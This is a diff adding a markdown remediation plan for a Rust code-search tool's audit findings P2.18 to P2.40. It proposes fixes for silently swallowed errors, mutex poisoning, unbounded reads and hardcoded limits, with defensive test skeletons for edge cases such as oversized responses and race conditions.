+## P2.18 — `LocalProvider::fetch_batch_results` returns empty map on missing batch_id
+
+**Finding:** P2.18 in audit-triage.md
+**Files:** `src/llm/local.rs:542-547`
+
+### Current code
+
+```rust
+fn fetch_batch_results(&self, batch_id: &str) -> Result<HashMap<String, String>, LlmError> {
+    // Drain the stash entry — returning empty if the id was already
+    // fetched or never existed.
+    let mut stash = self.stash.lock().unwrap();
+    Ok(stash.remove(batch_id).unwrap_or_default())
+}
+```
+
+### Replacement
+
+```rust
+fn fetch_batch_results(&self, batch_id: &str) -> Result<HashMap<String, String>, LlmError> {
+    let mut stash = self.stash.lock().unwrap_or_else(|p| p.into_inner());
+    match stash.remove(batch_id) {
+        Some(m) => Ok(m),
+        None => Err(LlmError::BatchNotFound(format!(
+            "local batch_id {batch_id} not found in stash — already fetched, or submission silently lost results"
+        ))),
+    }
+}
+```
+
+Add the variant at the top of `src/llm/error.rs` (or wherever `LlmError` is defined):
+
+```rust
+#[error("batch not found: {0}")]
+BatchNotFound(String),
+```
+
+### Notes
+
+- Mutex poison fix piggybacks here (recover via `into_inner` instead of `unwrap`) — same lesson as P1.9.
+- Callers in `summary.rs` / `doc_comments.rs` should distinguish `BatchNotFound` (data drift, hard error) from `Http`/`Internal` (transient).
+
+---
+
+## P2.19 — `serde_json::to_value(...).unwrap_or_else(json!({}))` at 6 sites
+
+**Finding:** P2.19 in audit-triage.md
+**Files:** `src/impact/format.rs:11-16, 101-106`, `src/cli/commands/io/context.rs:94-97, 320-323, 498-501`, `src/cli/commands/io/blame.rs:240-243`
+
+### Current code (representative — `src/impact/format.rs:11-16`)
+
+```rust
+pub fn impact_to_json(result: &ImpactResult) -> serde_json::Value {
+    serde_json::to_value(result).unwrap_or_else(|e| {
+        tracing::warn!(error = %e, "Failed to serialize ImpactResult");
+        serde_json::json!({})
+    })
+}
+```
+
+### Replacement
+
+```rust
+pub fn impact_to_json(result: &ImpactResult) -> Result<serde_json::Value, serde_json::Error> {
+    serde_json::to_value(result)
+}
+```
+
+Apply same shape to all six sites. Bump call sites to `?`-propagate. The functions all already terminate in `crate::cli::json_envelope::emit_json(&obj)?` which handles `Result`.
+
+### Notes
+
+- `serde_json::to_value` only fails on `Serialize` impl bugs — these are programmer errors, must fail loud, not produce `{}` and a journal warn.
+- Six near-identical changes; ship as one PR.
+
+---
+
+## P2.20 — `cache_stats` silently treats `QueryCache::open` failure as 0 bytes
+
+**Finding:** P2.20 in audit-triage.md
+**Files:** `src/cli/commands/infra/cache_cmd.rs:120-139`
+
+### Current code
+
+```rust
+let query_cache_size_bytes: u64 = {
+    let q_path = QueryCache::default_path();
+    if q_path.exists() {
+        match QueryCache::open(&q_path) {
+            Ok(qc) => qc.size_bytes().unwrap_or_else(|e| {
+                tracing::warn!(error = %e, "Query cache size_bytes failed");
+                0
+            }),
+            Err(e) => {
+                tracing::warn!(error = %e, "Query cache open failed for stats");
+                0
+            }
+        }
+    } else {
+        0
+    }
+};
+```
+
+### Replacement
+
+Surface the error as a structured field instead of collapsing to 0:
+
+```rust
+let (query_cache_size_bytes, query_cache_status): (u64, String) = {
+    let q_path = QueryCache::default_path();
+    if !q_path.exists() {
+        (0, "missing".to_string())
+    } else {
+        match QueryCache::open(&q_path) {
+            Ok(qc) => match qc.size_bytes() {
+                Ok(n) => (n, "ok".to_string()),
+                Err(e) => {
+                    tracing::warn!(error = %e, "Query cache size_bytes failed");
+                    (0, format!("error: {e}"))
+                }
+            },
+            Err(e) => {
+                tracing::warn!(error = %e, "Query cache open failed for stats");
+                (0, format!("error: {e}"))
+            }
+        }
+    }
+};
+```
+
+Add `query_cache_status` to the JSON envelope and to the text output.
+
+---
+
+## P2.21 — `slot_remove` masks `list_slots` failure as "only slot remaining"
+
+**Finding:** P2.21 in audit-triage.md
+**Files:** `src/cli/commands/infra/slot.rs:303-313`
+
+### Current code
+
+```rust
+let active = read_active_slot(project_cqs_dir).unwrap_or_else(|| DEFAULT_SLOT.to_string());
+let mut all = list_slots(project_cqs_dir).unwrap_or_default();
+all.retain(|n| n != name);
+
+if name == active {
+    if all.is_empty() {
+        anyhow::bail!(
+            "Refusing to remove the only remaining slot '{}'. Create another slot first.",
+            name
+        );
+    }
+    // ...
+}
+```
+
+### Replacement
+
+```rust
+use anyhow::Context;
+
+let active = read_active_slot(project_cqs_dir).unwrap_or_else(|| DEFAULT_SLOT.to_string());
+let mut all = list_slots(project_cqs_dir)
+    .context("Failed to list slots while validating remove")?;
+all.retain(|n| n != name);
+```
+
+### Notes
+
+- Same pattern at `src/cli/commands/infra/slot.rs:273` (`slot_promote`), `:304` (already), and `src/cli/commands/infra/doctor.rs:923` — sweep them all in this PR.
+
+---
+
+## P2.22 — `build_token_pack` swallows `get_caller_counts_batch` error
+
+**Finding:** P2.22 in audit-triage.md
+**Files:** `src/cli/commands/io/context.rs:438-441`
+
+### Current code
+
+```rust
+let caller_counts = store.get_caller_counts_batch(&names).unwrap_or_else(|e| {
+    tracing::warn!(error = %e, "Failed to fetch caller counts for token packing");
+    HashMap::new()
+});
+let (included, used) = pack_by_relevance(chunks, &caller_counts, budget, &embedder);
+```
+
+### Replacement
+
+`build_token_pack` already returns `Result`; propagate:
+
+```rust
+let caller_counts = store.get_caller_counts_batch(&names)
+    .context("Failed to fetch caller counts for token packing — ranking signal required")?;
+let (included, used) = pack_by_relevance(chunks, &caller_counts, budget, &embedder);
+```
+
+### Notes
+
+- Packing without ranking signal is worse than failing the command — current behavior silently degrades to file-order with no signal in JSON output.
+- Sibling `build_full_data` carries a `warnings` field; consider folding this into that pattern instead of `?` if the caller wants degraded output. The propagation path is preferred per the finding.
+
+---
+
+## P2.23 — `read --focus` silently empties `type_chunks` on store batch failure
+
+**Finding:** P2.23 in audit-triage.md
+**Files:** `src/cli/commands/io/read.rs:230-235`
+
+### Current code
+
+```rust
+let batch_results = store
+    .search_by_names_batch(&type_names, 5)
+    .unwrap_or_else(|e| {
+        tracing::warn!(error = %e, "Failed to batch-lookup type definitions for focused read");
+        std::collections::HashMap::new()
+    });
+```
+
+### Replacement
+
+Add a `warnings: Vec<String>` field to `FocusedReadOutput` and push when fetch fails:
+
+```rust
+let batch_results = match store.search_by_names_batch(&type_names, 5) {
+    Ok(m) => m,
+    Err(e) => {
+        let msg = format!("search_by_names_batch failed: {e}; type definitions omitted");
+        tracing::warn!(error = %e, "Failed to batch-lookup type definitions for focused read");
+        warnings.push(msg);
+        std::collections::HashMap::new()
+    }
+};
+```
+
+In the typed output struct:
+
+```rust
+#[derive(Serialize)]
+struct FocusedReadOutput {
+    // ... existing fields
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    warnings: Vec<String>,
+}
+```
+
+### Notes
+
+- Mirrors `SummaryOutput::warnings` in `src/cli/commands/io/context.rs:464`.
+- Either propagation (`?`) or warnings-field is acceptable; warnings-field preferred per the EH-V1.29-9 family.
+
+---
+
+## P2.24 — `serve::build_chunk_detail` collapses NULL signature/content to empty string
+
+**Finding:** P2.24 in audit-triage.md
+**Files:** `src/serve/data.rs:488-492`
+
+### Current code
+
+```rust
+let signature: String = row
+    .get::<Option<String>, _>("signature")
+    .unwrap_or_default();
+let doc: Option<String> = row.get("doc");
+let content: String = row.get::<Option<String>, _>("content").unwrap_or_default();
+```
+
+### Replacement
+
+```rust
+let signature: Option<String> = row.get("signature");
+let doc: Option<String> = row.get("doc");
+let content: Option<String> = row.get("content");
+```
+
+Update `ChunkDetail` struct to `signature: Option<String>` and `content: Option<String>`. Update `src/serve/assets/views/chunk-detail.js` to render `null` as a `<missing — DB column NULL>` placeholder instead of an empty pane.
+
+### Notes
+
+- NULL is a real signal (partial write during indexing, SIGKILL between INSERT phases) — flattening to `""` loses it.
+- The `content_preview` derivation at line 496 changes too: `content.as_deref().map(|c| c.lines().take(30)...)`.
+
+---
+
+## P2.25 — Per-request span and `build_*` spans disconnected via `spawn_blocking`
+
+**Finding:** P2.25 in audit-triage.md
+**Files:** `src/serve/handlers.rs:86,111,131,160,210,236` (every `spawn_blocking` call)
+
+### Current code (representative — handlers.rs:86)
+
+```rust
+let store = state.store.clone();
+let stats = tokio::task::spawn_blocking(move || super::data::build_stats(&store))
+    .await
+    .map_err(|e| ServeError::Internal(format!("stats join: {e}")))?
+    .map_err(ServeError::from)?;
+```
+
+### Replacement
+
+Capture the calling span and re-enter inside the closure:
+
+```rust
+use tracing::Instrument;
+let span = tracing::Span::current();
+let store = state.store.clone();
+let stats = tokio::task::spawn_blocking({
+    move || {
+        let _entered = span.enter();
+        super::data::build_stats(&store)
+    }
+})
+.await
+.map_err(|e| ServeError::Internal(format!("stats join: {e}")))?
+.map_err(ServeError::from)?;
+```
+
+Apply at all six handlers (stats / graph / chunk_detail / search / hierarchy / cluster_2d).
+
+### Notes
+
+- After this lands, drop the per-handler `tracing::info!` lines (`80, 100, 126, 149, 175, 201, 231`) — the inner `build_*` span entry plus `FmtSpan::CLOSE` will produce one structured event per request.
+- Ties to P1.20 (default subscriber drops INFO spans) — the value of this fix only materializes after that one ships.
+
+---
+
+## P2.26 — TC-ADV: `LocalProvider` body-size DoS test
+
+**Finding:** P2.26 in audit-triage.md
+**Files:** `src/llm/local.rs:474-500` (production); `src/llm/local.rs:595+` (existing tests module)
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod body_size_dos_tests {
+    use super::*;
+    use httpmock::prelude::*;
+
+    #[test]
+    fn test_oversized_response_body_capped_at_5mb() {
+        let server = MockServer::start();
+        // Mock 200-OK with a 50 MB JSON body
+        let huge_body: String = "{\"choices\":[{\"message\":{\"content\":\"".to_string()
+            + &"x".repeat(50 * 1024 * 1024)
+            + "\"}}]}";
+        let _m = server.mock(|when, then| {
+            when.method(POST).path("/v1/chat/completions");
+            then.status(200).body(huge_body);
+        });
+        let cfg = make_config(&format!("{}/v1", server.base_url()), Duration::from_secs(5));
+        let provider = LocalProvider::new(&cfg).unwrap();
+        let items = vec![/* one minimal chat item */];
+        let start = std::time::Instant::now();
+        let result = provider.submit_batch_prebuilt(&items, None);
+        // Expectation: either errors out with a body-size cap, or completes in
+        // bounded memory (we cannot assert allocator behavior portably; the
+        // PR-side fix should add a 4 MiB cap via reqwest body limits).
+        assert!(
+            result.is_err() || start.elapsed() < Duration::from_secs(30),
+            "unbounded body read or excessive retry stall"
+        );
+    }
+
+    #[test]
+    fn test_4xx_with_large_body_does_not_buffer_entire_body() {
+        let server = MockServer::start();
+        let _m = server.mock(|when, then| {
+            when.method(POST).path("/v1/chat/completions");
+            then.status(400).body("x".repeat(50 * 1024 * 1024));
+        });
+        let cfg = make_config(&format!("{}/v1", server.base_url()), Duration::from_secs(5));
+        let provider = LocalProvider::new(&cfg).unwrap();
+        // body_preview should produce ≤ 256 chars; assert it doesn't OOM
+        // and returns a bounded preview.
+        let result = provider.submit_batch_prebuilt(&[/* one item */], None);
+        assert!(result.is_err());
+        // Optional: peek into the LlmError variant and assert preview length
+    }
+}
+```
+
+### Notes
+
+- Production-side fix (per RB-V1.30-1): add `Content-Length` inspection or a `take(N)` adaptor with a 4 MiB cap on summary responses, 2 KiB on `body_preview`. New env var `CQS_LOCAL_LLM_MAX_BODY_BYTES`.
+- Tests remain meaningful even if the fix is deferred — they pin current unbounded behavior so a regression after the fix is loud.
+
+---
+
+## P2.27 — TC-ADV: cache accepts NaN/Inf embeddings
+
+**Finding:** P2.27 in audit-triage.md
+**Files:** `src/cache.rs:332-407` (`EmbeddingCache::write_batch`), `src/cache.rs:1677-1699` (`QueryCache::put`)
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod nan_inf_tests {
+    use super::*;
+
+    #[test]
+    fn test_write_batch_rejects_nan_embedding() {
+        let dir = tempfile::tempdir().unwrap();
+        let cache = EmbeddingCache::open(&dir.path().join("emb.db")).unwrap();
+        let bad = vec![1.0_f32, f32::NAN, 0.5, /* pad to dim */];
+        // Pad bad to expected dim
+        let dim = bad.len();
+        let entries = &[("a".repeat(64).as_str(), bad.as_slice())];
+        let written = cache.write_batch(entries, "fp1", dim).unwrap();
+        assert_eq!(written, 0, "NaN embedding must be rejected, not silently stored");
+        // Read back must return no row for that hash
+        let got = cache.read_batch(&[&"a".repeat(64)], "fp1", dim).unwrap();
+        assert!(got.is_empty(), "rejected entry must not appear in read_batch");
+    }
+
+    #[test]
+    fn test_write_batch_rejects_inf_embedding() {
+        let dir = tempfile::tempdir().unwrap();
+        let cache = EmbeddingCache::open(&dir.path().join("emb.db")).unwrap();
+        let bad = vec![f32::INFINITY; 16];
+        let entries = &[("b".repeat(64).as_str(), bad.as_slice())];
+        let written = cache.write_batch(entries, "fp1", 16).unwrap();
+        assert_eq!(written, 0);
+        let bad2 = vec![f32::NEG_INFINITY; 16];
+        let entries2 = &[("c".repeat(64).as_str(), bad2.as_slice())];
+        let written2 = cache.write_batch(entries2, "fp1", 16).unwrap();
+        assert_eq!(written2, 0);
+    }
+
+    #[test]
+    fn test_query_cache_put_rejects_non_finite() {
+        // Same shape against QueryCache::put
+    }
+}
+```
+
+### Notes
+
+- Production fix: add `if embedding.iter().any(|f| !f.is_finite()) { tracing::warn!(...); continue; }` next to the existing `embedding.len() != dim` skip block in both write paths.
+- #1105 made this worse by extending cache lifetime cross-slot.
+
+---
+
+## P2.28 — TC-ADV: slot create/remove TOCTOU under concurrent operation
+
+**Finding:** P2.28 in audit-triage.md
+**Files:** `src/cli/commands/infra/slot.rs:219-266` (slot_create), `src/cli/commands/infra/slot.rs:299-350` (slot_remove); existing tests at `:391-516`
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod toctou_tests {
+    use super::*;
+
+    #[test]
+    fn test_slot_create_concurrent_same_name() {
+        let dir = tempfile::tempdir().unwrap();
+        let cqs_dir = dir.path().join(".cqs");
+        std::fs::create_dir_all(&cqs_dir).unwrap();
+        let dir1 = cqs_dir.clone();
+        let dir2 = cqs_dir.clone();
+        let h1 = std::thread::spawn(move || slot_create(&dir1, "foo", Some("bge-large"), false));
+        let h2 = std::thread::spawn(move || slot_create(&dir2, "foo", Some("e5-base"), false));
+        let r1 = h1.join().unwrap();
+        let r2 = h2.join().unwrap();
+        // Contract: at most one returns Ok; the slot ends up with a deterministic model.
+        assert!(r1.is_ok() ^ r2.is_ok() || (r1.is_ok() && r2.is_err()) || (r1.is_err() && r2.is_ok()));
+        let model = read_slot_model(&cqs_dir, "foo");
+        assert!(model == Some("bge-large".into()) || model == Some("e5-base".into()));
+    }
+
+    #[test]
+    fn test_slot_remove_during_open_index_db() {
+        // Open a Store::open_readonly_pooled on slots/foo/index.db, spawn slot_remove
+        // from another thread, assert either the open store keeps working OR the remove
+        // returns an error. Currently neither is guaranteed.
+    }
+}
+```
+
+### Notes
+
+- Production fix: `flock` on `.cqs/slots.lock` acquired by both `slot_remove` and the indexer, so the second to-arrive blocks or errors instead of corrupting.
+- Pin current behavior even if not yet fixed — any future regression away from "deterministic" must trip this test.
+
+---
+
+## P2.29 — TC-ADV: Non-blocking HNSW rebuild — no panic/dim-drift/store-fail tests
+
+**Finding:** P2.29 in audit-triage.md
+**Files:** `src/cli/watch.rs:965-1042` (`spawn_hnsw_rebuild`), `:1058+` (`drain_pending_rebuild`); existing tests at `:3979-4115`
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod rebuild_adversarial_tests {
+    use super::*;
+
+    #[test]
+    fn test_spawn_hnsw_rebuild_dim_mismatch_clears_pending() {
+        // Set up a Store with dim=768, call spawn_hnsw_rebuild with expected_dim=1024,
+        // then drain_pending_rebuild; assert pending is cleared and no dangling channel.
+    }
+
+    #[test]
+    fn test_spawn_hnsw_rebuild_thread_panic_drops_delta_loudly() {
+        // Wrap the rebuild closure with a feature-flagged panic injection point.
+        // Assert the delta is NOT silently dropped (current behavior leaks it).
+        // Production fix wraps closure in catch_unwind and replays delta on panic.
+    }
+
+    #[test]
+    fn test_spawn_hnsw_rebuild_store_open_fails_clears_pending() {
+        // Point at a non-existent index path; assert drain_pending_rebuild
+        // clears pending after the receiver sees the error.
+    }
+
+    #[test]
+    fn test_spawn_hnsw_rebuild_failure_to_spawn_disconnect_path() {
+        // Synthesize spawn failure (rlimit on threads); assert a follow-up
+        // drain_pending_rebuild clears via Disconnected (does not leak forever).
+    }
+}
+```
+
+### Notes
+
+- The "delta dropped on panic" case is a real bug per the finding, not just a coverage gap. Test must fail today.
+- Production fix: wrap the spawn closure in `std::panic::catch_unwind` and replay the delta into `state.hnsw_index` on panic.
+
+---
+
+## P2.30 — TC-ADV: serve auth `strip_token_param` case/percent-encoding gaps
+
+**Finding:** P2.30 in audit-triage.md
+**Files:** `src/serve/auth.rs:101-115` (`strip_token_param`); existing tests at `:269-291`
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod auth_strip_tests {
+    use super::*;
+
+    #[test]
+    fn test_strip_token_param_case_insensitive() {
+        // ?Token=abc — currently kept in URL (capital T fails starts_with("token="))
+        // Pin the desired behavior: stripped (auth check should be case-insensitive
+        // on param name to match HTTP convention).
+        let stripped = strip_token_param("foo=1&Token=secret&bar=2");
+        assert!(!stripped.contains("Token"), "case-insensitive strip required");
+    }
+
+    #[test]
+    fn test_check_request_rejects_percent_encoded_token_key() {
+        // ?%74oken=abc (where %74 = 't')
+        // Today: literal starts_with("token=") fails, falls through to no-token, 401.
+        // Pin: either decode (preferred) or 401.
+    }
+
+    #[test]
+    fn test_strip_token_param_handles_double_ampersand() {
+        // ?token=abc&&depth=3 — the empty pair between && fails starts_with
+        // and survives into the rejoined query. Pin redirect output.
+        let stripped = strip_token_param("token=abc&&depth=3");
+        assert_eq!(stripped, "depth=3");
+    }
+
+    #[test]
+    fn test_strip_token_param_empty_value() {
+        // ?token= — pin behavior: stripped (so it doesn't sit in URL bar).
+        let stripped = strip_token_param("token=&depth=3");
+        assert_eq!(stripped, "depth=3");
+    }
+}
+```
+
+### Notes
+
+- Production fix: percent-decode the *key* via `percent_encoding::percent_decode_str` (already in dep tree) and lowercase the key. Token *value* stays exact-match for `ct_eq`.
+- Failing tests today are the SEC-7 leakage path (token survives in URL bar after redirect).
+
+---
+
+## P2.31 — TC-ADV: `slot::migrate_legacy` rollback path untested
+
+**Finding:** P2.31 in audit-triage.md
+**Files:** `src/slot/mod.rs:511-593` (migration), `:561-582` (rollback loop); tests at `:850+` cover happy-path only
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod migrate_rollback_tests {
+    use super::*;
+
+    #[test]
+    fn test_migrate_rollback_on_second_file_failure() {
+        // Plant index.db and index.db-wal; make index.db-wal fail to move
+        // (e.g. open it with an exclusive flock on Linux, or remove read perms
+        // mid-test). Assert:
+        //   - rollback restores index.db to .cqs/
+        //   - slots/ is fully cleaned up
+        //   - next migration call still works (idempotent recovery)
+    }
+
+    #[test]
+    fn test_migrate_rollback_failure_leaves_loud_signal() {
+        // Make rollback ITSELF fail (chmod source dir read-only after first move).
+        // Assert migration returns Err(SlotError::Migration(...)) AND there is a
+        // single known signal (e.g. .cqs/migration_failed marker) — not silent
+        // split state.
+    }
+}
+```
+
+### Notes
+
+- Production fix (per RB-V1.30-4): write a `.cqs/migration.lock` sentinel at start, only remove on full success. Subsequent migration calls error if sentinel found.
+- EBUSY on Windows for `index.db-wal` is the realistic trigger.
+
+---
+
+## P2.32 — TC-ADV: `LocalProvider` non-HTTP api_base + concurrency mis-sizing
+
+**Finding:** P2.32 in audit-triage.md
+**Files:** `src/llm/local.rs:88-121` (`LocalProvider::new`), `:128-312` (`submit_via_chat_completions`), `:153` (channel sizing)
+
+### Test skeleton
+
+```rust
+#[cfg(test)]
+mod local_provider_edge_tests {
+    use super::*;
+
+    #[test]
+    fn test_non_http_api_base_fails_fast() {
+        let cfg = make_config("file:///tmp/foo", Duration::from_secs(5));
+        let provider = LocalProvider::new(&cfg).unwrap();
+        let start = std::time::Instant::now();
+        let result = provider.submit_batch_prebuilt(&[/* one item */], None);
+        // Should error within 100ms, NOT take 7.5s for the full retry stall.
+        assert!(result.is_err());
+        assert!(start.elapsed() < Duration::from_millis(500));
+    }
+
+    #[test]
+    fn test_api_base_with_trailing_slash_works() {
+        // Pin behavior: ?token=abc with cfg api_base ending in `/`
+        // either succeeds (most servers tolerate doubled slash) or normalizes.
+    }
+
+    #[test]
+    fn test_concurrency_clamped_to_item_count_when_smaller() {
+        // For items.len()=1 and concurrency=64, only 1 worker thread
+        // should be spawned. Verify via a counter in a custom worker-spawn hook,
+        // or by enumerating thread names.
+    }
+}
+```
+
+### Notes
+
+- Production fix: bail in `LocalProvider::new` if `Url::parse(&api_base).scheme() not in {"http", "https"}`. Clamp workers via `let workers = self.concurrency.min(items.len()).max(1);` at line 166.
+
+---
+
+## P2.33 — RB: Slot pointer files unbounded `read_to_string`
+
+**Finding:** P2.33 in audit-triage.md
+**Files:** `src/slot/mod.rs:207, 323`
+
+### Current code (representative — :207)
+
+```rust
+let raw = match fs::read_to_string(&path) {
+    Ok(s) => s,
+    Err(e) if e.kind() == std::io::ErrorKind::NotFound => return None,
+    Err(e) => { /* warn, return None */ }
+};
+```
+
+### Replacement
+
+```rust
+use std::io::Read;
+
+let raw = match std::fs::File::open(&path) {
+    Err(e) if e.kind() == std::io::ErrorKind::NotFound => return None,
+    Err(e) => { tracing::warn!(path = %path.display(), error = %e, "open failed"); return None; }
+    Ok(f) => {
+        let mut buf = String::new();
+        if let Err(e) = f.take(4096).read_to_string(&mut buf) {
+            tracing::warn!(path = %path.display(), error = %e, "bounded read failed; treating as missing");
+            return None;
+        }
+        buf
+    }
+};
+```
+
+Apply at both sites (`:207` `read_slot_model` and `:323` `read_active_slot`).
+
+### Notes
+
+- 4 KiB is enough for `slot.toml` (and 100× headroom on the active_slot pointer).
+- An oversize pointer file becomes "treated as missing" with a `tracing::warn!`, instead of OOMing every CLI invocation.
+
+---
+
+## P2.34 — RB: `migrate_legacy` rollback leaves undetectable half-state
+
+**Finding:** P2.34 in audit-triage.md
+**Files:** `src/slot/mod.rs:511-593`, `:628-638` (`move_file`)
+
+### Replacement
+
+Write a sentinel file before the migration starts; remove on full success only. On startup, refuse if sentinel exists:
+
+```rust
+let sentinel = project_cqs_dir.join("migration.lock");
+if sentinel.exists() {
+    return Err(SlotError::Migration(format!(
+        "previous migration failed (see {}). Manually recover then `rm {}`",
+        sentinel.display(),
+        sentinel.display()
     )));
 }
+std::fs::write(&sentinel, format!("started_at={}\n", chrono::Utc::now().to_rfc3339()))?;
+// ... do the migration (existing logic)
+// On full success only:
+std::fs::remove_file(&sentinel)?;
 ```
 
-**Fix**:
+On the rollback path, leave the sentinel in place but write the failure reason to it:
 
-Validate ORT dim is non-negative before cast, then use `checked_mul`:
+```rust
+// Inside rollback failure arm:
+let _ = std::fs::write(&sentinel, format!(
+    "failed_at={}\nrollback_failure={}\nrolled_back_files={:?}\n",
+    chrono::Utc::now().to_rfc3339(), e, rolled_back
+));
+```
+
+### Notes
+
+- Pairs with P2.31 test skeleton (rollback failure leaves a loud signal).
+- Half-state ambiguity is the actual robustness gap — the sentinel file disambiguates.
+
+---
+
+## P2.35 — RB: `auth_attempts` / `auth_failures` mutex unwrap cascades worker poison
+
+**Finding:** P2.35 in audit-triage.md
+**Files:** `src/llm/local.rs:393-396`
+
+### Current code
+
+```rust
+if is_first_attempt && (status == StatusCode::UNAUTHORIZED || status == StatusCode::FORBIDDEN) {
+    *auth_attempts.lock().unwrap() += 1;
+    *auth_failures.lock().unwrap() += 1;
+} else if is_first_attempt {
+    *auth_attempts.lock().unwrap() += 1;
+}
+```
+
+### Replacement
+
+```rust
+if is_first_attempt && (status == StatusCode::UNAUTHORIZED || status == StatusCode::FORBIDDEN) {
+    *auth_attempts.lock().unwrap_or_else(|p| p.into_inner()) += 1;
+    *auth_failures.lock().unwrap_or_else(|p| p.into_inner()) += 1;
+} else if is_first_attempt {
+    *auth_attempts.lock().unwrap_or_else(|p| p.into_inner()) += 1;
+}
+```
+
+### Notes
+
+- Counters are advisory — a poisoned mutex shouldn't escalate to a panic cascade across 64 worker threads.
+- Same pattern used elsewhere in P1.9 (LocalProvider mutex poison fix).
+
+---
+
+## P2.36 — RB: redirect policy disagrees between production (none) and doctor (limited(2))
+
+**Finding:** P2.36 in audit-triage.md
+**Files:** `src/llm/local.rs:99` (`Policy::none()`) vs `src/cli/commands/infra/doctor.rs:578` (`Policy::limited(2)`)
+
+### Current code
+
+```rust
+// src/llm/local.rs:97-100
+let http = Client::builder()
+    .timeout(timeout)
+    .redirect(reqwest::redirect::Policy::none())
+    .build()?;
+
+// src/cli/commands/infra/doctor.rs:576-580
+let client = match reqwest::blocking::Client::builder()
+    .timeout(std::time::Duration::from_secs(3))
+    .redirect(reqwest::redirect::Policy::limited(2))
+    .build()
+```
+
+### Replacement
+
+Align both to `Policy::limited(2)` (a same-origin HTTP→HTTPS redirect on bind-localhost is benign):
+
+```rust
+// src/llm/local.rs:99
+.redirect(reqwest::redirect::Policy::limited(2))
+```
+
+### Notes
+
+- Alternative: keep `Policy::none()` in production but log a once-per-launch warning in doctor when a redirect was followed during the probe. Less surgical but preserves strict prod stance.
+
+---
+
+## P2.37 — SHL: CAGRA `itopk_size < k` on small indexes
+
+**Finding:** P2.37 in audit-triage.md
+**Files:** `src/cagra.rs:359` (computation), `:166-170` (`cagra_itopk_max_default`)
+
+### Current code
+
+```rust
+let itopk_size = (k * 2).clamp(itopk_min, itopk_max);
+```
+
+### Replacement
+
+Enforce the cuVS hard requirement `itopk_size >= k`, and degrade if the cap can't honor it:
+
+```rust
+// CONSTRAINT: cuVS CAGRA requires itopk_size >= k. Document at top of fn.
+let itopk_size = (k * 2).clamp(itopk_min, itopk_max).max(k);
+if itopk_size > itopk_max {
+    tracing::warn!(
+        k,
+        itopk_max,
+        n_vectors = self.len(),
+        "CAGRA: k exceeds itopk_max for this corpus size; falling back to HNSW"
+    );
+    return Err(CagraError::CapacityExceeded { k, itopk_max });
+}
+```
+
+Add `CagraError::CapacityExceeded { k: usize, itopk_max: usize }` variant.
+
+### Notes
+
+- The `MEMORY.md` workaround "keep eval at limit=20" only protects the eval path; production `cqs search --limit 500 --rerank` over a small subset trips this silently.
+- Caller in `src/store/search.rs` must catch `CapacityExceeded` and fall back to HNSW cleanly.
+
+---
+
+## P2.38 — SHL: `nl::generate_nl` `char_budget` defaults to 512 even with 2048 max_seq_len
+
+**Finding:** P2.38 in audit-triage.md
+**Files:** `src/nl/mod.rs:222-229`
+
+### Current code
+
+```rust
+static MAX_SEQ: std::sync::OnceLock<usize> = std::sync::OnceLock::new();
+let max_seq = *MAX_SEQ.get_or_init(|| {
+    std::env::var("CQS_MAX_SEQ_LENGTH")
+        .ok()
+        .and_then(|v| v.parse().ok())
+        .unwrap_or(512)
+});
+```
+
+### Replacement
+
+Plumb the active model's `max_seq_length` through. Pass it as an argument to `generate_nl_with_template`:
+
+```rust
+pub(crate) fn generate_nl_with_template(
+    chunk: &Chunk,
+    template: NlTemplate,
+    model_max_seq_len: usize,  // NEW: from caller's ModelConfig
+) -> String {
+    // ...
+    // Env var becomes a fallback override only:
+    let max_seq = std::env::var("CQS_MAX_SEQ_LENGTH")
+        .ok()
+        .and_then(|v| v.parse().ok())
+        .unwrap_or(model_max_seq_len);
+    let char_budget = max_seq.saturating_mul(4).saturating_sub(200).max(400);
+    // ...
+}
+```
+
+Caller in `pipeline/parsing.rs` already has `Embedder` in scope; pass `embedder.model_config().max_seq_length`.
+
+### Notes
+
+- BGE/E5/v9-200k all use 512; **nomic-coderank uses 2048** per `embedder/models.rs:366` — env var as source of truth caps it at 25% of capacity.
+- The OnceLock memoization no longer makes sense once the value depends on the caller; drop it.
+
+---
+
+## P2.39 — SHL: `MAX_BATCH_SIZE = 10_000` LLM module
+
+**Finding:** P2.39 in audit-triage.md
+**Files:** `src/llm/mod.rs:192`; consumers at `src/llm/summary.rs:58,92`, `src/llm/hyde.rs:39-41`, `src/llm/doc_comments.rs:271`
+
+### Current code
+
+```rust
+const MAX_BATCH_SIZE: usize = 10_000;
+```
+
+### Replacement
+
+Move to `src/limits.rs` with an env resolver:
+
+```rust
+// src/limits.rs
+pub fn llm_max_batch_size() -> usize {
+    parse_env_usize_clamped("CQS_LLM_MAX_BATCH_SIZE", 10_000, 1, 100_000)
+}
+```
+
+Replace the `const MAX_BATCH_SIZE` import with a function call at every consumer site. At CLI exit, when truncation triggered, surface a hint (current `tracing::info!` is invisible without `RUST_LOG=info`):
+
+```rust
+if remaining_chunks > 0 {
+    eprintln!("note: {} chunks remain unprocessed (cap CQS_LLM_MAX_BATCH_SIZE={}). Rerun to continue.",
+        remaining_chunks, llm_max_batch_size());
+}
+```
+
+### Notes
+
+- 100,000 hard cap honors Anthropic's actual Batches API limit.
+- HyDE and doc_comments share the same const — one env var covers both, but consider `CQS_LLM_HYDE_MAX_BATCH_SIZE` if cost characteristics diverge enough.
+
+---
+
+## P2.40 — SHL: serve `ABS_MAX_GRAPH_NODES`/`ABS_MAX_CLUSTER_NODES` 50k hardcoded
+
+**Finding:** P2.40 in audit-triage.md
+**Files:** `src/serve/data.rs:17,24,505,542,571`
+
+### Current code
+
+```rust
+pub(crate) const ABS_MAX_GRAPH_NODES: usize = 50_000;
+pub(crate) const ABS_MAX_GRAPH_EDGES: usize = 500_000;
+pub(crate) const ABS_MAX_CLUSTER_NODES: usize = 50_000;
+// ... in build_chunk_detail:
+// :505 LIMIT 50 callers
+// :542 LIMIT 50 callees
+// :571 LIMIT 20 tests
+```
+
+### Replacement
+
+Move to `src/limits.rs` with env overrides + a hard ceiling:
+
+```rust
+pub fn serve_max_graph_nodes() -> usize {
+    parse_env_usize_clamped("CQS_SERVE_MAX_GRAPH_NODES", 50_000, 1, 1_000_000)
+}
